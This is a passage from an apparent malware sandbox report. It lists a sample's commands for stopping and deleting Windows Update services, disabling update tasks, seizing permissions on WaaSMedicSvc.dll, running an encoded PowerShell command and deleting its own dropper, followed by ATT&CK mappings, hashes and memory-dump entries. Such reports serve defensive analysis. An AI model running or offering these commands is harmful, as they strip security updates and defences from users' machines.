"\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:832

C:\Windows\system32\sc.exe
sc stop UsoSvc
7⤵
PID:1216

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
7⤵
PID:1740

C:\Windows\system32\sc.exe
sc stop wuauserv
7⤵
PID:1112

C:\Windows\system32\sc.exe
sc stop bits
7⤵
PID:280

C:\Windows\system32\sc.exe
sc stop dosvc
7⤵
PID:800

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
7⤵
- Modifies registry key
PID:1580

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
7⤵
- Modifies registry key
PID:968

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
7⤵
- Modifies registry key
PID:696

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
7⤵
- Modifies registry key
PID:1800

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
7⤵
- Modifies registry key
PID:1376

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1360

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:884

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:800

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:1752

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:1032

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:1620

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
7⤵
PID:696

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
7⤵
PID:1696

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
7⤵
PID:1752

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
7⤵
PID:392

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
7⤵
PID:908

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
7⤵
PID:1916

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
7⤵
PID:380

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
6⤵
PID:1208

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "ywsuegiszt"
7⤵
PID:1696

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\iexplore.exe"
4⤵
PID:772

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:1356

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "389957550-1379642556119073956620358251674863723190326788910237159722042188189"
1⤵
PID:1912

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "21470708412134226635061859431768142873028371781014822430-1117334451-1755571637"
1⤵
PID:648

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-14552288031355476162-8283002513313987881292578898-234312383-554136528-348568474"
1⤵
PID:1584

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGcAaABkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeQBsAHcAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBmAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABsAHUAaQAjAD4A"
1⤵
PID:1756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGcAaABkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeQBsAHcAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBmAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABsAHUAaQAjAD4A"
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1832

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1581051392-9373466381641146149-1012105118-1243346862-412135746744474480-1303994753"
1⤵
PID:1688

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\iexplore.exe
Filesize
2.3MB

MD5
ed73affd7b0ec16ed1f1207f19ba9d77

SHA1
1f4f3f70f3c2b2db3c543ae31f243cb18ae85095

SHA256
1f684ba70e35713de20fbda7d65a1c792e7d449568c026af5f590074bd852b6e

SHA512
1399dc35f33348ff6b7bc44245de6f87827a28dea6d829a1132fd5c0c19c9ac68cef537cce68449473a2943add60adf2413dafe82c422e9a0c20fafebad7e642

Download Submit
C:\Users\Admin\AppData\Local\Temp\iexplore.exe
Filesize
2.3MB

MD5
ed73affd7b0ec16ed1f1207f19ba9d77

SHA1
1f4f3f70f3c2b2db3c543ae31f243cb18ae85095

SHA256
1f684ba70e35713de20fbda7d65a1c792e7d449568c026af5f590074bd852b6e

SHA512
1399dc35f33348ff6b7bc44245de6f87827a28dea6d829a1132fd5c0c19c9ac68cef537cce68449473a2943add60adf2413dafe82c422e9a0c20fafebad7e642

Download Submit
C:\Users\Admin\AppData\Local\Temp\update.exe
Filesize
1.9MB

MD5
6c08423aa3ca9067cc5583dc28f329fa

SHA1
20017a7855f2c082c6e6ce3223729123ce604879

SHA256
b16c284f45e0dde9a321d5a6ecf0729345839eebc350b5d97073dd10332c551f

SHA512
eb399e3d93a84912c26bb7f507c621f54ede53dced5a01fec683103a497c780bd1cb1f4bfc53d458082028c731f19cda826eca0e4d069b8a9225f84ef4e414b0

Download Submit
C:\Users\Admin\AppData\Roaming\Internet Explorer\UserData\Low\iexplore.exe
Filesize
2.3MB

MD5
ed73affd7b0ec16ed1f1207f19ba9d77

SHA1
1f4f3f70f3c2b2db3c543ae31f243cb18ae85095

SHA256
1f684ba70e35713de20fbda7d65a1c792e7d449568c026af5f590074bd852b6e

SHA512
1399dc35f33348ff6b7bc44245de6f87827a28dea6d829a1132fd5c0c19c9ac68cef537cce68449473a2943add60adf2413dafe82c422e9a0c20fafebad7e642

Download Submit
C:\Users\Admin\AppData\Roaming\Internet Explorer\UserData\Low\iexplore.exe
Filesize
2.3MB

MD5
ed73affd7b0ec16ed1f1207f19ba9d77

SHA1
1f4f3f70f3c2b2db3c543ae31f243cb18ae85095

SHA256
1f684ba70e35713de20fbda7d65a1c792e7d449568c026af5f590074bd852b6e

SHA512
1399dc35f33348ff6b7bc44245de6f87827a28dea6d829a1132fd5c0c19c9ac68cef537cce68449473a2943add60adf2413dafe82c422e9a0c20fafebad7e642

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
3844074621e8f9c1a9b6ae42de980675

SHA1
1c70ffd4606f57a030a1b97413af77c4a5ebe1a8

SHA256
08d110a23137166fb04a99900fa892229af6ed0c2b2b25ea9517a5d9c4cf74b4

SHA512
0e5d1298b69f6c17fa01dc47ff7f3190d2196dee7b0fc391865dd96654a0e0ce0cd426fae45e95b2f7d6ef36490323823b20f76e139d98b37714cfc9ee91a2db

Download Submit
C:\Windows\Tasks\dialersvc32.job
Filesize
564B

MD5
e7141dedca00befebe162476c9d91979

SHA1
a3676fd1ef3199f71e9edfcde50decbb3822ee79

SHA256
44b9c75b28cd9285002ef5df54dad97d4bdf2b9b72b35d04849cccc0c0d0f871

SHA512
f4f68163c27ec856f53e9fc1b931246630a2a255d35ca86be8969fdf1ed142d4b8f87f3fa712d6cafbb2db10eb588197b1cec87d6806d87e30c50e5d25aa0345

Download Submit
\Users\Admin\AppData\Local\Temp\iexplore.exe
Filesize
2.3MB

MD5
ed73affd7b0ec16ed1f1207f19ba9d77

SHA1
1f4f3f70f3c2b2db3c543ae31f243cb18ae85095

SHA256
1f684ba70e35713de20fbda7d65a1c792e7d449568c026af5f590074bd852b6e

SHA512
1399dc35f33348ff6b7bc44245de6f87827a28dea6d829a1132fd5c0c19c9ac68cef537cce68449473a2943add60adf2413dafe82c422e9a0c20fafebad7e642

Download Submit
\Users\Admin\AppData\Local\Temp\update.exe
Filesize
1.9MB

MD5
6c08423aa3ca9067cc5583dc28f329fa

SHA1
20017a7855f2c082c6e6ce3223729123ce604879

SHA256
b16c284f45e0dde9a321d5a6ecf0729345839eebc350b5d97073dd10332c551f

SHA512
eb399e3d93a84912c26bb7f507c621f54ede53dced5a01fec683103a497c780bd1cb1f4bfc53d458082028c731f19cda826eca0e4d069b8a9225f84ef4e414b0

Download Submit
\Users\Admin\AppData\Local\Temp\update.exe
Filesize
1.9MB

MD5
6c08423aa3ca9067cc5583dc28f329fa

SHA1
20017a7855f2c082c6e6ce3223729123ce604879

SHA256
b16c284f45e0dde9a321d5a6ecf0729345839eebc350b5d97073dd10332c551f

SHA512
eb399e3d93a84912c26bb7f507c621f54ede53dced5a01fec683103a497c780bd1cb1f4bfc53d458082028c731f19cda826eca0e4d069b8a9225f84ef4e414b0

Download Submit
\Users\Admin\AppData\Local\Temp\update.exe
Filesize
1.9MB

MD5
6c08423aa3ca9067cc5583dc28f329fa

SHA1
20017a7855f2c082c6e6ce3223729123ce604879

SHA256
b16c284f45e0dde9a321d5a6ecf0729345839eebc350b5d97073dd10332c551f

SHA512
eb399e3d93a84912c26bb7f507c621f54ede53dced5a01fec683103a497c780bd1cb1f4bfc53d458082028c731f19cda826eca0e4d069b8a9225f84ef4e414b0

Download Submit
\Users\Admin\AppData\Local\Temp\update.exe
Filesize
1.9MB

MD5
6c08423aa3ca9067cc5583dc28f329fa

SHA1
20017a7855f2c082c6e6ce3223729123ce604879

SHA256
b16c284f45e0dde9a321d5a6ecf0729345839eebc350b5d97073dd10332c551f

SHA512
eb399e3d93a84912c26bb7f507c621f54ede53dced5a01fec683103a497c780bd1cb1f4bfc53d458082028c731f19cda826eca0e4d069b8a9225f84ef4e414b0

Download Submit
\Users\Admin\AppData\Local\Temp\update.exe
Filesize
1.9MB

MD5
6c08423aa3ca9067cc5583dc28f329fa

SHA1
20017a7855f2c082c6e6ce3223729123ce604879

SHA256
b16c284f45e0dde9a321d5a6ecf0729345839eebc350b5d97073dd10332c551f

SHA512
eb399e3d93a84912c26bb7f507c621f54ede53dced5a01fec683103a497c780bd1cb1f4bfc53d458082028c731f19cda826eca0e4d069b8a9225f84ef4e414b0

Download Submit
\Users\Admin\AppData\Local\Temp\update.exe
Filesize
1.9MB

MD5
6c08423aa3ca9067cc5583dc28f329fa

SHA1
20017a7855f2c082c6e6ce3223729123ce604879

SHA256
b16c284f45e0dde9a321d5a6ecf0729345839eebc350b5d97073dd10332c551f

SHA512
eb399e3d93a84912c26bb7f507c621f54ede53dced5a01fec683103a497c780bd1cb1f4bfc53d458082028c731f19cda826eca0e4d069b8a9225f84ef4e414b0

Download Submit
\Users\Admin\AppData\Local\Temp\update.exe
Filesize
1.9MB

MD5
6c08423aa3ca9067cc5583dc28f329fa

SHA1
20017a7855f2c082c6e6ce3223729123ce604879

SHA256
b16c284f45e0dde9a321d5a6ecf0729345839eebc350b5d97073dd10332c551f

SHA512
eb399e3d93a84912c26bb7f507c621f54ede53dced5a01fec683103a497c780bd1cb1f4bfc53d458082028c731f19cda826eca0e4d069b8a9225f84ef4e414b0

Download Submit
\Users\Admin\AppData\Roaming\Internet Explorer\UserData\Low\iexplore.exe
Filesize
2.3MB

MD5
ed73affd7b0ec16ed1f1207f19ba9d77

SHA1
1f4f3f70f3c2b2db3c543ae31f243cb18ae85095

SHA256
1f684ba70e35713de20fbda7d65a1c792e7d449568c026af5f590074bd852b6e

SHA512
1399dc35f33348ff6b7bc44245de6f87827a28dea6d829a1132fd5c0c19c9ac68cef537cce68449473a2943add60adf2413dafe82c422e9a0c20fafebad7e642

Download Submit
memory/280-304-0x0000000000000000-mapping.dmp

Download
memory/328-377-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/328-375-0x0000000000BD0000-0x0000000000BFA000-memory.dmp

Filesize
168KB

Download
memory/392-407-0x0000000000000000-mapping.dmp

Download
memory/416-145-0x0000000000800000-0x0000000000823000-memory.dmp

Filesize
140KB

Download
memory/416-137-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/416-133-0x0000000000800000-0x0000000000823000-memory.dmp

Filesize
140KB

Download
memory/416-136-0x000007FEBE730000-0x000007FEBE740000-memory.dmp

Filesize
64KB

Download
memory/416-151-0x0000000000830000-0x000000000085A000-memory.dmp

Filesize
168KB

Download
memory/460-154-0x0000000000230000-0x000000000025A000-memory.dmp

Filesize
168KB

Download
memory/460-141-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/460-140-0x000007FEBE730000-0x000007FEBE740000-memory.dmp

Filesize
64KB

Download
memory/476-144-0x000007FEBE730000-0x000007FEBE740000-memory.dmp

Filesize
64KB

Download
memory/476-155-0x0000000000140000-0x000000000016A000-memory.dmp

Filesize
168KB

Download
memory/476-149-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/484-157-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/484-156-0x000007FEBE730000-0x000007FEBE740000-memory.dmp

Filesize
64KB

Download
memory/484-367-0x00000000001C0000-0x00000000001EA000-memory.dmp

Filesize
168KB

Download
memory/576-89-0x0000000000000000-mapping.dmp

Download
memory/588-153-0x0000000000000000-mapping.dmp

Download
memory/596-170-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/596-166-0x000007FEBE730000-0x000007FEBE740000-memory.dmp

Filesize
64KB

Download
memory/596-368-0x0000000000300000-0x000000000032A000-memory.dmp

Filesize
168KB

Download
memory/604-76-0x0000000002664000-0x0000000002667000-memory.dmp

Filesize
12KB

Download
memory/604-73-0x0000000000000000-mapping.dmp

Download
memory/604-75-0x000007FEEC4A0000-0x000007FEECFFD000-memory.dmp

Filesize
11.4MB

Download
memory/604-77-0x000000001B760000-0x000000001BA5F000-memory.dmp

Filesize
3.0MB

Download
memory/604-78-0x000000000266B000-0x000000000268A000-memory.dmp

Filesize
124KB

Download
memory/676-369-0x0000000000390000-0x00000000003BA000-memory.dmp

Filesize
168KB

Download
memory/676-174-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/676-172-0x000007FEBE730000-0x000007FEBE740000-memory.dmp

Filesize
64KB

Download
memory/696-355-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/696-354-0x00000000001E0000-0x000000000020A000-memory.dmp

Filesize
168KB

Download
memory/696-319-0x0000000000000000-mapping.dmp

Download
memory/696-349-0x0000000000000000-mapping.dmp

Download
memory/756-181-0x0000000000000000-mapping.dmp

Download
memory/756-85-0x0000000000000000-mapping.dmp

Download
memory/764-370-0x0000000000890000-0x00000000008BA000-memory.dmp

Filesize
168KB

Download
memory/764-177-0x000007FEBE730000-0x000007FEBE740000-memory.dmp

Filesize
64KB

Download
memory/764-178-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/772-150-0x0000000000000000-mapping.dmp

Download
memory/800-308-0x0000000000000000-mapping.dmp

Download
memory/800-345-0x0000000000000000-mapping.dmp

Download
memory/800-84-0x0000000000000000-mapping.dmp

Download
memory/808-371-0x00000000008C0000-0x00000000008EA000-memory.dmp

Filesize
168KB

Download
memory/808-182-0x000007FEBE730000-0x000007FEBE740000-memory.dmp

Filesize
64KB

Download
memory/808-184-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/832-294-0x0000000000000000-mapping.dmp

Download
memory/852-373-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/852-372-0x0000000000870000-0x000000000089A000-memory.dmp

Filesize
168KB

Download
memory/864-119-0x0000000077470000-0x0000000077619000-memory.dmp

Filesize
1.7MB

Download
memory/864-118-0x0000000000E5B000-0x0000000000E7A000-memory.dmp

Filesize
124KB

Download
memory/864-112-0x0000000000000000-mapping.dmp

Download
memory/864-127-0x0000000077250000-0x000000007736F000-memory.dmp

Filesize
1.1MB

Download
memory/864-125-0x0000000077470000-0x0000000077619000-memory.dmp

Filesize
1.7MB

Download
memory/864-116-0x000007FEEC530000-0x000007FEED08D000-memory.dmp

Filesize
11.4MB

Download
memory/864-120-0x0000000077250000-0x000000007736F000-memory.dmp

Filesize
1.1MB

Download
memory/864-117-0x0000000000E54000-0x0000000000E57000-memory.dmp

Filesize
12KB

Download
memory/872-379-0x0000000000200000-0x000000000022A000-memory.dmp

Filesize
168KB

Download
memory/872-383-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/876-374-0x0000000000890000-0x00000000008BA000-memory.dmp

Filesize
168KB

Download
memory/884-322-0x0000000000000000-mapping.dmp

Download
memory/884-340-0x0000000000190000-0x00000000001BA000-memory.dmp

Filesize
168KB

Download
memory/884-341-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/908-56-0x0000000000000000-mapping.dmp

Download
memory/908-418-0x0000000000000000-mapping.dmp

Download
memory/968-317-0x0000000000000000-mapping.dmp

Download
memory/972-399-0x00000000004F0000-0x000000000051A000-memory.dmp

Filesize
168KB

Download
memory/988-110-0x0000000000000000-mapping.dmp

Download
memory/1032-103-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1032-100-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1032-107-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1032-93-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1032-94-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1032-347-0x0000000000000000-mapping.dmp

Download
memory/1032-96-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1032-98-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1032-99-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1032-109-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1032-101-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1032-104-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1032-105-0x0000000140002348-mapping.dmp

Download
memory/1056-384-0x00000000001B0000-0x00000000001DA000-memory.dmp

Filesize
168KB

Download
memory/1056-388-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/1100-62-0x0000000000000000-mapping.dmp

Download
memory/1112-297-0x0000000000000000-mapping.dmp

Download
memory/1136-389-0x0000000001FB0000-0x0000000001FDA000-memory.dmp

Filesize
168KB

Download
memory/1136-390-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/1192-90-0x0000000000000000-mapping.dmp

Download
memory/1196-122-0x00000001400024C8-mapping.dmp

Download
memory/1196-121-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/1196-132-0x0000000077470000-0x0000000077619000-memory.dmp

Filesize
1.7MB

Download
memory/1196-131-0x0000000077250000-0x000000007736F000-memory.dmp

Filesize
1.1MB

Download
memory/1196-129-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/1196-128-0x0000000077470000-0x0000000077619000-memory.dmp

Filesize
1.7MB

Download
memory/1196-126-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/1208-337-0x0000000000401BEA-mapping.dmp

Download
memory/1216-72-0x0000000000000000-mapping.dmp

Download
memory/1216-295-0x0000000000000000-mapping.dmp

Download
memory/1224-391-0x00000000001D0000-0x00000000001FA000-memory.dmp

Filesize
168KB

Download
memory/1224-392-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/1268-393-0x0000000003900000-0x000000000392A000-memory.dmp

Filesize
168KB

Download
memory/1268-394-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/1356-169-0x0000000000000000-mapping.dmp

Download
memory/1360-321-0x0000000000000000-mapping.dmp

Download
memory/1376-320-0x0000000000000000-mapping.dmp

Download
memory/1388-396-0x00000000002D0000-0x00000000002FA000-memory.dmp

Filesize
168KB

Download
memory/1388-397-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/1396-123-0x0000000074090000-0x000000007463B000-memory.dmp

Filesize
5.7MB

Download
memory/1396-114-0x0000000000000000-mapping.dmp

Download
memory/1408-395-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/1408-398-0x0000000000460000-0x000000000048A000-memory.dmp

Filesize
168KB

Download
memory/1460-213-0x0000000000000000-mapping.dmp

Download
memory/1580-313-0x0000000000000000-mapping.dmp

Download
memory/1584-366-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/1584-365-0x00000000019F0000-0x0000000001A1A000-memory.dmp

Filesize
168KB

Download
memory/1620-346-0x0000000000000000-mapping.dmp

Download
memory/1640-54-0x0000000076241000-0x0000000076243000-memory.dmp

Filesize
8KB

Download
memory/1640-224-0x0000000000000000-mapping.dmp

Download
memory/1668-80-0x0000000000000000-mapping.dmp

Download
memory/1676-146-0x0000000000000000-mapping.dmp

Download
memory/1676-363-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/1676-361-0x0000000000240000-0x000000000026A000-memory.dmp

Filesize
168KB

Download
memory/1684-86-0x0000000000000000-mapping.dmp

Download
memory/1696-378-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/1696-376-0x00000000004C0000-0x00000000004EA000-memory.dmp

Filesize
168KB

Download
memory/1696-356-0x0000000000000000-mapping.dmp

Download
memory/1740-171-0x0000000000000000-mapping.dmp

Download
memory/1740-296-0x0000000000000000-mapping.dmp

Download
memory/1752-381-0x0000000000000000-mapping.dmp

Download
memory/1752-266-0x0000000000000000-mapping.dmp

Download
memory/1752-281-0x00000000001C0000-0x00000000001EA000-memory.dmp

Filesize
168KB

Download
memory/1752-282-0x0000000000220000-0x000000000024A000-memory.dmp

Filesize
168KB

Download
memory/1752-387-0x0000000000140000-0x000000000016A000-memory.dmp

Filesize
168KB

Download
memory/1752-342-0x0000000000000000-mapping.dmp

Download
memory/1756-214-0x0000000000000000-mapping.dmp

Download
memory/1768-158-0x0000000000000000-mapping.dmp

Download
memory/1784-260-0x0000000000000000-mapping.dmp

Download
memory/1784-261-0x0000000000350000-0x000000000037A000-memory.dmp

Filesize
168KB

Download
memory/1800-318-0x0000000000000000-mapping.dmp

Download
memory/1820-111-0x0000000000000000-mapping.dmp

Download
memory/1832-235-0x00000000025BB000-0x00000000025DA000-memory.dmp

Filesize
124KB

Download
memory/1832-231-0x00000000025B4000-0x00000000025B7000-memory.dmp

Filesize
12KB

Download
memory/1832-71-0x000007FEFBCF1000-0x000007FEFBCF3000-memory.dmp

Filesize
8KB

Download
memory/1832-70-0x000000001C1C0000-0x000000001C3F2000-memory.dmp

Filesize
2.2MB

Download
memory/1832-220-0x0000000000000000-mapping.dmp

Download
memory/1832-67-0x000000013F740000-0x000000013F98C000-memory.dmp

Filesize
2.3MB

Download
memory/1832-92-0x0000000000810000-0x0000000000816000-memory.dmp

Filesize
24KB

Download
memory/1832-59-0x0000000000000000-mapping.dmp

Download
memory/1840-81-0x0000000000000000-mapping.dmp

Download
memory/1848-288-0x00000000001E0000-0x000000000020A000-memory.dmp

Filesize
168KB

Download
memory/1848-287-0x0000000000000000-mapping.dmp

Download
memory/1852-83-0x0000000000000000-mapping.dmp

Download
memory/1856-82-0x0000000000000000-mapping.dmp

Download
memory/1876-176-0x0000000000000000-mapping.dmp

Download
memory/1916-425-0x0000000000000000-mapping.dmp

Download
memory/1980-88-0x0000000000000000-mapping.dmp

Download
memory/2000-87-0x0000000000000000-mapping.dmp

Download
memory/2004-160-0x0000000000000000-mapping.dmp

Download
memory/2004-165-0x000000013FB80000-0x000000013FDCC000-memory.dmp

Filesize
2.3MB

Download
memory/2004-358-0x00000000374B0000-0x00000000374C0000-memory.dmp

Filesize
64KB

Download
memory/2004-357-0x000000001B3C0000-0x000000001B3EA000-memory.dmp

Filesize
168KB

Download
memory/2024-91-0x0000000000000000-mapping.dmp

Download
memory/2028-79-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads